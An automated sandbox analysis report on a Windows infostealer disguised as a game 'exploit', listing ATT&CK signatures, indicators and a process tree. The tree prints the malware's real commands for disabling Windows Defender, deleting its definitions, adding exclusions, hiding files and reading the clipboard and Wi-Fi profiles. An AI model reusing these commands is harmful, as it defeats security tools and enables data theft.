2fa3f17ecf4e81b96837aff155173a34c81f14e16d543237649eaa0885c01f27

Analysis

max time kernel
446s
max time network
447s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241211-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
23-12-2024 17:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Xenox Exploit.exe
Size

7.5MB
MD5

809744fdb0a46e19d8fdb5db88b95a31
SHA1

bc8d73f5aced88732c4d669e87026c7806bce2ca
SHA256

2fa3f17ecf4e81b96837aff155173a34c81f14e16d543237649eaa0885c01f27
SHA512

4a665b44b84cbf2b284d1670d1c54a04bbd7244fce715e4b54b350e9077a5dd974d455775bddfc2e3fbc9e930ba3755c0610e42f4f913d2642a0b324b74b7264
SSDEEP

196608:udQCwV+IurErvI9pWjgN3ZdahF0pbH1AY7WtQsNo/03vC1C:pVRurEUWjqeWx06rYYC

Score

10^/10

collection credential_access defense_evasion discovery evasion execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs

Uses mpcmdrun utility to delete all AV definitions.

evasion

Impair Defenses

T1562

Command and Scripting Interpreter

T1059

pid	Process
2880	MpCmdRun.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
2812	powershell.exe
3096	powershell.exe
4028	powershell.exe
2644	powershell.exe
3972	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	Xenox Exploit.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
2508	cmd.exe
788	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4460	rar.exe

Loads dropped DLL 17 IoCs

pid	Process
2036	Xenox Exploit.exe
2036	Xenox Exploit.exe
2036	Xenox Exploit.exe
2036	Xenox Exploit.exe
2036	Xenox Exploit.exe
2036	Xenox Exploit.exe
2036	Xenox Exploit.exe
2036	Xenox Exploit.exe
2036	Xenox Exploit.exe
2036	Xenox Exploit.exe
2036	Xenox Exploit.exe
2036	Xenox Exploit.exe
2036	Xenox Exploit.exe
2036	Xenox Exploit.exe
2036	Xenox Exploit.exe
2036	Xenox Exploit.exe
2036	Xenox Exploit.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
28	discord.com
29	discord.com

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
14	ip-api.com
26	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 5 IoCs

discovery

Process Discovery

T1057

pid	Process
3580	tasklist.exe
2256	tasklist.exe
4880	tasklist.exe
3668	tasklist.exe
3236	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
1528	cmd.exe

UPX packed file 59 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x002800000004611c-21.dat	upx
behavioral1/memory/2036-25-0x00007FFCEDE80000-0x00007FFCEE544000-memory.dmp	upx
behavioral1/files/0x002800000004610f-28.dat	upx
behavioral1/files/0x002800000004611a-30.dat	upx
behavioral1/files/0x0028000000046116-48.dat	upx
behavioral1/files/0x0028000000046115-47.dat	upx
behavioral1/files/0x0028000000046114-46.dat	upx
behavioral1/files/0x0028000000046113-45.dat	upx
behavioral1/files/0x0028000000046112-44.dat	upx
behavioral1/files/0x0028000000046111-43.dat	upx
behavioral1/files/0x0028000000046110-42.dat	upx
behavioral1/files/0x002800000004610e-41.dat	upx
behavioral1/files/0x0028000000046121-40.dat	upx
behavioral1/files/0x0028000000046120-39.dat	upx
behavioral1/files/0x002800000004611f-38.dat	upx
behavioral1/memory/2036-32-0x00007FFD077F0000-0x00007FFD077FF000-memory.dmp	upx
behavioral1/memory/2036-31-0x00007FFD02970000-0x00007FFD02995000-memory.dmp	upx
behavioral1/files/0x002800000004611b-35.dat	upx
behavioral1/files/0x0028000000046119-34.dat	upx
behavioral1/memory/2036-54-0x00007FFCFD110000-0x00007FFCFD13D000-memory.dmp	upx
behavioral1/memory/2036-56-0x00007FFD04850000-0x00007FFD0486A000-memory.dmp	upx
behavioral1/memory/2036-58-0x00007FFCFCF80000-0x00007FFCFCFA4000-memory.dmp	upx
behavioral1/memory/2036-60-0x00007FFCFCE00000-0x00007FFCFCF7F000-memory.dmp	upx
behavioral1/memory/2036-62-0x00007FFD029E0000-0x00007FFD029F9000-memory.dmp	upx
behavioral1/memory/2036-64-0x00007FFD07430000-0x00007FFD0743D000-memory.dmp	upx
behavioral1/memory/2036-66-0x00007FFCF9A50000-0x00007FFCF9A83000-memory.dmp	upx
behavioral1/memory/2036-71-0x00007FFD02970000-0x00007FFD02995000-memory.dmp	upx
behavioral1/memory/2036-72-0x00007FFCEDDB0000-0x00007FFCEDE7D000-memory.dmp	upx
behavioral1/memory/2036-74-0x00007FFCED880000-0x00007FFCEDDA9000-memory.dmp	upx
behavioral1/memory/2036-70-0x00007FFCEDE80000-0x00007FFCEE544000-memory.dmp	upx
behavioral1/memory/2036-76-0x00007FFD02880000-0x00007FFD02894000-memory.dmp	upx
behavioral1/memory/2036-79-0x00007FFD070D0000-0x00007FFD070DD000-memory.dmp	upx
behavioral1/memory/2036-78-0x00007FFCFD110000-0x00007FFCFD13D000-memory.dmp	upx
behavioral1/memory/2036-81-0x00007FFCED390000-0x00007FFCED4AB000-memory.dmp	upx
behavioral1/memory/2036-102-0x00007FFCFCF80000-0x00007FFCFCFA4000-memory.dmp	upx
behavioral1/memory/2036-122-0x00007FFCFCE00000-0x00007FFCFCF7F000-memory.dmp	upx
behavioral1/memory/2036-216-0x00007FFD029E0000-0x00007FFD029F9000-memory.dmp	upx
behavioral1/memory/2036-277-0x00007FFCF9A50000-0x00007FFCF9A83000-memory.dmp	upx
behavioral1/memory/2036-292-0x00007FFCEDDB0000-0x00007FFCEDE7D000-memory.dmp	upx
behavioral1/memory/2036-295-0x00007FFCED880000-0x00007FFCEDDA9000-memory.dmp	upx
behavioral1/memory/2036-316-0x00007FFCEDE80000-0x00007FFCEE544000-memory.dmp	upx
behavioral1/memory/2036-330-0x00007FFCED390000-0x00007FFCED4AB000-memory.dmp	upx
behavioral1/memory/2036-322-0x00007FFCFCE00000-0x00007FFCFCF7F000-memory.dmp	upx
behavioral1/memory/2036-317-0x00007FFD02970000-0x00007FFD02995000-memory.dmp	upx
behavioral1/memory/2036-346-0x00007FFCED880000-0x00007FFCEDDA9000-memory.dmp	upx
behavioral1/memory/2036-356-0x00007FFCEDDB0000-0x00007FFCEDE7D000-memory.dmp	upx
behavioral1/memory/2036-355-0x00007FFCF9A50000-0x00007FFCF9A83000-memory.dmp	upx
behavioral1/memory/2036-354-0x00007FFD07430000-0x00007FFD0743D000-memory.dmp	upx
behavioral1/memory/2036-353-0x00007FFD029E0000-0x00007FFD029F9000-memory.dmp	upx
behavioral1/memory/2036-352-0x00007FFCFCE00000-0x00007FFCFCF7F000-memory.dmp	upx
behavioral1/memory/2036-351-0x00007FFCFCF80000-0x00007FFCFCFA4000-memory.dmp	upx
behavioral1/memory/2036-350-0x00007FFD04850000-0x00007FFD0486A000-memory.dmp	upx
behavioral1/memory/2036-349-0x00007FFCFD110000-0x00007FFCFD13D000-memory.dmp	upx
behavioral1/memory/2036-348-0x00007FFD02970000-0x00007FFD02995000-memory.dmp	upx
behavioral1/memory/2036-347-0x00007FFD077F0000-0x00007FFD077FF000-memory.dmp	upx
behavioral1/memory/2036-345-0x00007FFCED390000-0x00007FFCED4AB000-memory.dmp	upx
behavioral1/memory/2036-344-0x00007FFD070D0000-0x00007FFD070DD000-memory.dmp	upx
behavioral1/memory/2036-343-0x00007FFD02880000-0x00007FFD02894000-memory.dmp	upx
behavioral1/memory/2036-331-0x00007FFCEDE80000-0x00007FFCEE544000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4608	cmd.exe
2632	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
4092	netsh.exe
760	cmd.exe

Detects videocard installed 1 TTPs 3 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3096	WMIC.exe
1204	WMIC.exe
2744	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
4608	systeminfo.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2632	PING.EXE

Suspicious behavior: EnumeratesProcesses 54 IoCs

pid	Process
3916	WMIC.exe
3916	WMIC.exe
3916	WMIC.exe
3916	WMIC.exe
2644	powershell.exe
2812	powershell.exe
2644	powershell.exe
2644	powershell.exe
2812	powershell.exe
2812	powershell.exe
3096	WMIC.exe
3096	WMIC.exe
3096	WMIC.exe
3096	WMIC.exe
1204	WMIC.exe
1204	WMIC.exe
1204	WMIC.exe
1204	WMIC.exe
3972	powershell.exe
3972	powershell.exe
5060	WMIC.exe
5060	WMIC.exe
5060	WMIC.exe
5060	WMIC.exe
788	powershell.exe
788	powershell.exe
3568	powershell.exe
3568	powershell.exe
3568	powershell.exe
788	powershell.exe
3096	powershell.exe
3096	powershell.exe
1780	powershell.exe
1780	powershell.exe
2080	WMIC.exe
2080	WMIC.exe
2080	WMIC.exe
2080	WMIC.exe
4652	WMIC.exe
4652	WMIC.exe
4652	WMIC.exe
4652	WMIC.exe
5016	WMIC.exe
5016	WMIC.exe
5016	WMIC.exe
5016	WMIC.exe
4028	powershell.exe
4028	powershell.exe
2744	WMIC.exe
2744	WMIC.exe
2744	WMIC.exe
2744	WMIC.exe
3776	powershell.exe
3776	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3580	tasklist.exe
Token: SeIncreaseQuotaPrivilege	3916	WMIC.exe
Token: SeSecurityPrivilege	3916	WMIC.exe
Token: SeTakeOwnershipPrivilege	3916	WMIC.exe
Token: SeLoadDriverPrivilege	3916	WMIC.exe
Token: SeSystemProfilePrivilege	3916	WMIC.exe
Token: SeSystemtimePrivilege	3916	WMIC.exe
Token: SeProfSingleProcessPrivilege	3916	WMIC.exe
Token: SeIncBasePriorityPrivilege	3916	WMIC.exe
Token: SeCreatePagefilePrivilege	3916	WMIC.exe
Token: SeBackupPrivilege	3916	WMIC.exe
Token: SeRestorePrivilege	3916	WMIC.exe
Token: SeShutdownPrivilege	3916	WMIC.exe
Token: SeDebugPrivilege	3916	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3916	WMIC.exe
Token: SeRemoteShutdownPrivilege	3916	WMIC.exe
Token: SeUndockPrivilege	3916	WMIC.exe
Token: SeManageVolumePrivilege	3916	WMIC.exe
Token: 33	3916	WMIC.exe
Token: 34	3916	WMIC.exe
Token: 35	3916	WMIC.exe
Token: 36	3916	WMIC.exe
Token: SeDebugPrivilege	2644	powershell.exe
Token: SeDebugPrivilege	2812	powershell.exe
Token: SeIncreaseQuotaPrivilege	3916	WMIC.exe
Token: SeSecurityPrivilege	3916	WMIC.exe
Token: SeTakeOwnershipPrivilege	3916	WMIC.exe
Token: SeLoadDriverPrivilege	3916	WMIC.exe
Token: SeSystemProfilePrivilege	3916	WMIC.exe
Token: SeSystemtimePrivilege	3916	WMIC.exe
Token: SeProfSingleProcessPrivilege	3916	WMIC.exe
Token: SeIncBasePriorityPrivilege	3916	WMIC.exe
Token: SeCreatePagefilePrivilege	3916	WMIC.exe
Token: SeBackupPrivilege	3916	WMIC.exe
Token: SeRestorePrivilege	3916	WMIC.exe
Token: SeShutdownPrivilege	3916	WMIC.exe
Token: SeDebugPrivilege	3916	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3916	WMIC.exe
Token: SeRemoteShutdownPrivilege	3916	WMIC.exe
Token: SeUndockPrivilege	3916	WMIC.exe
Token: SeManageVolumePrivilege	3916	WMIC.exe
Token: 33	3916	WMIC.exe
Token: 34	3916	WMIC.exe
Token: 35	3916	WMIC.exe
Token: 36	3916	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2644	powershell.exe
Token: SeSecurityPrivilege	2644	powershell.exe
Token: SeTakeOwnershipPrivilege	2644	powershell.exe
Token: SeLoadDriverPrivilege	2644	powershell.exe
Token: SeSystemProfilePrivilege	2644	powershell.exe
Token: SeSystemtimePrivilege	2644	powershell.exe
Token: SeProfSingleProcessPrivilege	2644	powershell.exe
Token: SeIncBasePriorityPrivilege	2644	powershell.exe
Token: SeCreatePagefilePrivilege	2644	powershell.exe
Token: SeBackupPrivilege	2644	powershell.exe
Token: SeRestorePrivilege	2644	powershell.exe
Token: SeShutdownPrivilege	2644	powershell.exe
Token: SeDebugPrivilege	2644	powershell.exe
Token: SeSystemEnvironmentPrivilege	2644	powershell.exe
Token: SeRemoteShutdownPrivilege	2644	powershell.exe
Token: SeUndockPrivilege	2644	powershell.exe
Token: SeManageVolumePrivilege	2644	powershell.exe
Token: 33	2644	powershell.exe
Token: 34	2644	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2304 wrote to memory of 2036	2304	Xenox Exploit.exe	84
PID 2304 wrote to memory of 2036	2304	Xenox Exploit.exe	84
PID 2036 wrote to memory of 2080	2036	Xenox Exploit.exe	86
PID 2036 wrote to memory of 2080	2036	Xenox Exploit.exe	86
PID 2036 wrote to memory of 4092	2036	Xenox Exploit.exe	87
PID 2036 wrote to memory of 4092	2036	Xenox Exploit.exe	87
PID 2036 wrote to memory of 4688	2036	Xenox Exploit.exe	88
PID 2036 wrote to memory of 4688	2036	Xenox Exploit.exe	88
PID 2036 wrote to memory of 2108	2036	Xenox Exploit.exe	91
PID 2036 wrote to memory of 2108	2036	Xenox Exploit.exe	91
PID 2036 wrote to memory of 764	2036	Xenox Exploit.exe	94
PID 2036 wrote to memory of 764	2036	Xenox Exploit.exe	94
PID 2108 wrote to memory of 3580	2108	cmd.exe	96
PID 2108 wrote to memory of 3580	2108	cmd.exe	96
PID 764 wrote to memory of 3916	764	cmd.exe	97
PID 764 wrote to memory of 3916	764	cmd.exe	97
PID 4092 wrote to memory of 2812	4092	cmd.exe	98
PID 4092 wrote to memory of 2812	4092	cmd.exe	98
PID 2080 wrote to memory of 2644	2080	cmd.exe	99
PID 2080 wrote to memory of 2644	2080	cmd.exe	99
PID 4688 wrote to memory of 3664	4688	cmd.exe	100
PID 4688 wrote to memory of 3664	4688	cmd.exe	100
PID 2036 wrote to memory of 3992	2036	Xenox Exploit.exe	171
PID 2036 wrote to memory of 3992	2036	Xenox Exploit.exe	171
PID 3992 wrote to memory of 4264	3992	cmd.exe	105
PID 3992 wrote to memory of 4264	3992	cmd.exe	105
PID 2036 wrote to memory of 3744	2036	Xenox Exploit.exe	155
PID 2036 wrote to memory of 3744	2036	Xenox Exploit.exe	155
PID 3744 wrote to memory of 2420	3744	cmd.exe	108
PID 3744 wrote to memory of 2420	3744	cmd.exe	108
PID 2036 wrote to memory of 1828	2036	Xenox Exploit.exe	109
PID 2036 wrote to memory of 1828	2036	Xenox Exploit.exe	109
PID 1828 wrote to memory of 3096	1828	cmd.exe	180
PID 1828 wrote to memory of 3096	1828	cmd.exe	180
PID 2036 wrote to memory of 3288	2036	Xenox Exploit.exe	112
PID 2036 wrote to memory of 3288	2036	Xenox Exploit.exe	112
PID 3288 wrote to memory of 1204	3288	cmd.exe	114
PID 3288 wrote to memory of 1204	3288	cmd.exe	114
PID 2036 wrote to memory of 1528	2036	Xenox Exploit.exe	115
PID 2036 wrote to memory of 1528	2036	Xenox Exploit.exe	115
PID 2036 wrote to memory of 1340	2036	Xenox Exploit.exe	116
PID 2036 wrote to memory of 1340	2036	Xenox Exploit.exe	116
PID 4092 wrote to memory of 2880	4092	cmd.exe	165
PID 4092 wrote to memory of 2880	4092	cmd.exe	165
PID 1528 wrote to memory of 5056	1528	cmd.exe	120
PID 1528 wrote to memory of 5056	1528	cmd.exe	120
PID 1340 wrote to memory of 3972	1340	cmd.exe	121
PID 1340 wrote to memory of 3972	1340	cmd.exe	121
PID 2036 wrote to memory of 3308	2036	Xenox Exploit.exe	122
PID 2036 wrote to memory of 3308	2036	Xenox Exploit.exe	122
PID 2036 wrote to memory of 1708	2036	Xenox Exploit.exe	123
PID 2036 wrote to memory of 1708	2036	Xenox Exploit.exe	123
PID 1708 wrote to memory of 2256	1708	cmd.exe	126
PID 1708 wrote to memory of 2256	1708	cmd.exe	126
PID 3308 wrote to memory of 4880	3308	cmd.exe	127
PID 3308 wrote to memory of 4880	3308	cmd.exe	127
PID 2036 wrote to memory of 3384	2036	Xenox Exploit.exe	128
PID 2036 wrote to memory of 3384	2036	Xenox Exploit.exe	128
PID 2036 wrote to memory of 2508	2036	Xenox Exploit.exe	130
PID 2036 wrote to memory of 2508	2036	Xenox Exploit.exe	130
PID 2036 wrote to memory of 4184	2036	Xenox Exploit.exe	132
PID 2036 wrote to memory of 4184	2036	Xenox Exploit.exe	132
PID 2036 wrote to memory of 1148	2036	Xenox Exploit.exe	133
PID 2036 wrote to memory of 1148	2036	Xenox Exploit.exe	133

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
5056	attrib.exe
3516	attrib.exe
1124	attrib.exe

C:\Users\Admin\AppData\Local\Temp\Xenox Exploit.exe
"C:\Users\Admin\AppData\Local\Temp\Xenox Exploit.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2304
- C:\Users\Admin\AppData\Local\Temp\Xenox Exploit.exe
  "C:\Users\Admin\AppData\Local\Temp\Xenox Exploit.exe"
  2⤵
  - Drops file in Drivers directory
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:2036
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Xenox Exploit.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2080
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Xenox Exploit.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2644
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4092
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2812
  - - C:\Program Files\Windows Defender\MpCmdRun.exe
      "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
      4⤵
      Deletes Windows Defender Definitions
      PID:2880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Debes tener bloxtrap para poder usar este exploit', 0, 'Information', 48+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4688
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Debes tener bloxtrap para poder usar este exploit', 0, 'Information', 48+16);close()"
      4⤵
      PID:3664
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2108
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:3580
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:764
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3916
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3992
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
      4⤵
      PID:4264
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3744
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
      4⤵
      PID:2420
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1828
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:3096
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3288
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      Suspicious behavior: EnumeratesProcesses
      PID:1204
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Xenox Exploit.exe""
    3⤵
    - Hide Artifacts: Hidden Files and Directories
    - Suspicious use of WriteProcessMemory
    PID:1528
  - - C:\Windows\system32\attrib.exe
      attrib +h +s "C:\Users\Admin\AppData\Local\Temp\Xenox Exploit.exe"
      4⤵
      Views/modifies file attributes
      PID:5056
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ‍.scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1340
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\  ‍.scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:3972
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3308
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:4880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1708
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:2256
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    PID:3384
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:5060
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    PID:2508
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      PID:788
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    PID:4184
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      PID:3668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:1148
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4684
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    PID:760
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:4092
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    PID:1280
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:4608
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
    3⤵
    PID:3992
  - - C:\Windows\system32\reg.exe
      REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
      4⤵
      PID:1900
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 